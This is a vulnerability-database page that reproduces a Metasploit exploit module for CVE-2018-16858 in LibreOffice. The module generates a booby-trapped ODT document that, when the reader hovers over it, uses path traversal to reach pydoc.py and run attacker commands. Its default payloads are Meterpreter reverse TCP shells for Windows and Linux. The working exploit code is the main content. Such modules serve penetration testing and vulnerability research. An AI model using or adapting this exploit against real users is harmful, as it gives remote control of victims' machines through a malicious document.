Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LibreOffice 6.0.7 / 6.1.3 - Macro Code Execution Exploit

🗓️ 18 Apr 2019 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 281 Views

LibreOffice 6.0.7 / 6.1.3 Macro Code Execution Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		LibreOffice < 6.2.6 Macro - Python Code Execution Exploit
21 Aug 201900:00
zdt
GithubExploit		Exploit for Product UI does not Warn User of Unsafe Actions in Libreoffice
14 Apr 201911:10
githubexploit
ATTACKERKB		LibreOffice Macro Code Execution
25 Mar 201900:00
attackerkb
Amazon		Important: libreoffice
25 Sep 202300:00
amazon
Tenable Nessus		Alibaba Cloud Linux 3 : 0038: libreoffice (ALINUX3-SA-2022:0038)
14 May 202500:00
nessus
Tenable Nessus		CentOS 7 : libreoffice (CESA-2019:2130)
30 Aug 201900:00
nessus
Tenable Nessus		Debian DLA-1669-1 : libreoffice security update
11 Feb 201900:00
nessus
Tenable Nessus		Debian DLA-1947-1 : libreoffice security update
7 Oct 201900:00
nessus
Tenable Nessus		Debian DSA-4381-1 : libreoffice - security update
4 Feb 201900:00
nessus
Tenable Nessus		Debian DSA-4501-1 : libreoffice - security update
20 Aug 201900:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'LibreOffice Macro Code Execution',
      'Description'    => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. A macro can be tied
        to a program event by including the script that contains the macro and
        the function name to be executed. Additionally, a directory traversal
        vulnerability exists in the component that references the Python script
        to be executed. This allows a program event to execute functions from Python
        scripts relative to the path of the samples macros folder. The pydoc.py script
        included with LibreOffice contains the tempfilepager function that passes
        arguments to os.system, allowing RCE.

        This module generates an ODT file with a mouse over event that
        when triggered, will execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'Alex Inführ', # Vulnerability discovery and PoC
        'Shelby Pace'  # Metasploit Module
      ],
      'References'     =>
        [
          [ 'CVE', '2018-16858' ],
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
        ],
      'Platform'       => [ 'win', 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [
            'Windows',
            {
              'Platform'        =>  'win',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'Payload'         =>  'windows/meterpreter/reverse_tcp',
              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
            }
          ],
          [
            'Linux',
            {
              'Platform'        =>  'linux',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
              'DefaultOptions'  =>  { 'PrependFork' =>  true },
              'CmdStagerFlavor' =>  'printf',
            }
          ]
        ],
      'DisclosureDate'  =>  "Oct 18, 2018",
      'DefaultTarget'   =>  0
    ))

    register_options(
    [
      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
    ])
  end

  def gen_windows_cmd
    opts =
    {
      :remove_comspec       =>  true,
      :method               =>  'reflection',
      :encode_final_payload =>  true
    }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
    @cmd << ' && echo'
  end

  def gen_linux_cmd
    @cmd = generate_cmdstager.first
    @cmd << ' && echo'
  end

  def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    libre_file
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  def exploit
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
    if datastore['TARGET'] == 0
      gen_windows_cmd
    elsif datastore['TARGET'] == 1
      gen_linux_cmd
    else
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
    fodt_file = gen_file(path)

    file_create(fodt_file)
  end
end

#  0day.today [2019-04-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Apr 2019 00:00Current
9High risk
Vulners AI Score9
EPSS0.92343
libreofficemacro executionpythondirectory traversalremote code executioncve-2018-16858windowslinuxodt filemetasploitexploit
281